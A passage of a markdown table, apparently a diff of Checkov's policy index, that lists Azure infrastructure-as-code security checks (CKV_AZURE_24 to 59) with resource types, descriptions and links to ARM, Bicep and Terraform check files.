90 days' for SQL servers | arm | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py) | -| 1614 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | -| 1615 | CKV_AZURE_24 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | -| 1616 | CKV_AZURE_24 | resource | azurerm_mssql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | -| 1617 | CKV_AZURE_24 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | -| 1618 | CKV_AZURE_24 | resource | azurerm_sql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | -| 1619 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | arm | 
[SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | -| 1620 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | Bicep | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | -| 1621 | CKV_AZURE_25 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Threat Detection types' is set to 'All' | Terraform | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py) | -| 1622 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | arm | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | -| 1623 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Bicep | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | -| 1624 | CKV_AZURE_26 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Terraform | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py) | -| 1625 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | arm | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | -| 1626 | CKV_AZURE_27 | resource | 
Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Bicep | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | -| 1627 | CKV_AZURE_27 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Terraform | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py) | -| 1628 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | arm | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | -| 1629 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Bicep | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | -| 1630 | CKV_AZURE_28 | resource | azurerm_mysql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Terraform | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py) | -| 1631 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | arm | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | -| 1632 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL 
connection' is set to 'ENABLED' for PostgreSQL Database Server | Bicep | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | -| 1633 | CKV_AZURE_29 | resource | azurerm_postgresql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Terraform | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py) | -| 1634 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1635 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1636 | CKV_AZURE_30 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1637 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1638 | CKV_AZURE_30 | resource | configurations | Ensure 
server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1639 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 1640 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 1641 | CKV_AZURE_31 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py) | -| 1642 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 1643 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 1644 | CKV_AZURE_32 | resource | 
Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1645 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1646 | CKV_AZURE_32 | resource | azurerm_postgresql_configuration | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1647 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1648 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1649 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | arm | 
[StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | -| 1650 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Bicep | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | -| 1651 | CKV_AZURE_33 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Terraform | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py) | -| 1652 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1653 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1654 | CKV_AZURE_34 | resource | azurerm_storage_container | Ensure that 'Public access level' is set to Private for blob containers | Terraform | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py) | -| 1655 | CKV_AZURE_34 | resource | blobServices/containers | Ensure 
that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1656 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1657 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1658 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1659 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | arm | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py) | -| 1660 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | Bicep | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | -| 1661 | CKV_AZURE_35 | resource | azurerm_storage_account | Ensure default network access rule for Storage Accounts is set to deny | Terraform | 
[StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | -| 1662 | CKV_AZURE_35 | resource | azurerm_storage_account_network_rules | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | -| 1663 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | arm | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py) | -| 1664 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Bicep | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | -| 1665 | CKV_AZURE_36 | resource | azurerm_storage_account | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | -| 1666 | CKV_AZURE_36 | resource | azurerm_storage_account_network_rules | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | -| 1667 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | arm | 
[MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | -| 1668 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | Bicep | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | -| 1669 | CKV_AZURE_37 | resource | azurerm_monitor_log_profile | Ensure that Activity Log Retention is set 365 days or greater | Terraform | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py) | -| 1670 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | arm | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | -| 1671 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | Bicep | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | -| 1672 | CKV_AZURE_38 | resource | azurerm_monitor_log_profile | Ensure audit profile captures all the activities | Terraform | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py) | -| 1673 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | arm | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | -| 1674 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom 
subscription owner roles are created | Bicep | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | -| 1675 | CKV_AZURE_39 | resource | azurerm_role_definition | Ensure that no custom subscription owner roles are created | Terraform | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py) | -| 1676 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | arm | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | -| 1677 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | Bicep | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | -| 1678 | CKV_AZURE_40 | resource | azurerm_key_vault_key | Ensure that the expiration date is set on all keys | Terraform | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py) | -| 1679 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | arm | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | -| 1680 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | Bicep | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | -| 1681 | CKV_AZURE_41 | resource | azurerm_key_vault_secret | Ensure that the expiration date is set on all secrets | Terraform | 
[SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py) | -| 1682 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | arm | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | -| 1683 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | Bicep | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | -| 1684 | CKV_AZURE_42 | resource | azurerm_key_vault | Ensure the key vault is recoverable | Terraform | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py) | -| 1685 | CKV_AZURE_43 | resource | azurerm_storage_account | Ensure Storage Accounts adhere to the naming rules | Terraform | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py) | -| 1686 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | arm | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | -| 1687 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | Bicep | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | -| 1688 | CKV_AZURE_44 | resource | azurerm_storage_account | Ensure Storage Account is using the latest version of TLS encryption | Terraform | 
[StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py) |
-| 1689 | CKV_AZURE_45 | resource | azurerm_virtual_machine | Ensure that no sensitive credentials are exposed in VM custom_data | Terraform | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py) |
-| 1690 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | arm | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) |
-| 1691 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Bicep | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) |
-| 1692 | CKV_AZURE_47 | resource | azurerm_mariadb_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Terraform | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py) |
-| 1693 | CKV_AZURE_48 | resource | azurerm_mariadb_server | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | Terraform | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py) |
-| 1694 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | arm | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) |
-| 1695 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) |
-| 1696 | CKV_AZURE_49 | resource | azurerm_linux_virtual_machine_scale_set | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py) |
-| 1697 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | arm | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) |
-| 1698 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | Bicep | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) |
-| 1699 | CKV_AZURE_50 | resource | azurerm_linux_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) |
-| 1700 | CKV_AZURE_50 | resource | azurerm_windows_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) |
-| 1701 | CKV_AZURE_52 | resource | azurerm_mssql_server | Ensure MSSQL is using the latest version of TLS encryption | Terraform | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py) |
-| 1702 | CKV_AZURE_53 | resource | azurerm_mysql_server | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Terraform | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py) |
-| 1703 | CKV_AZURE_54 | resource | azurerm_mysql_server | Ensure MySQL is using the latest version of TLS encryption | Terraform | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py) |
-| 1704 | CKV_AZURE_55 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Servers | Terraform | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py) |
-| 1705 | CKV_AZURE_56 | resource | azurerm_function_app | Ensure that function apps enables Authentication | Terraform | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py) |
-| 1706 | CKV_AZURE_57 | resource | azurerm_app_service | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) |
-| 1707 | CKV_AZURE_57 | resource | azurerm_linux_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) |
-| 1708 | CKV_AZURE_57 | resource | azurerm_windows_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) |
-| 1709 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | arm | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) |
-| 1710 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | Bicep | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) |
-| 1711 | CKV_AZURE_58 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces enables managed virtual networks | Terraform | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py) |
-| 1712 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | arm | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) |
-| 1713 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | Bicep | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) |
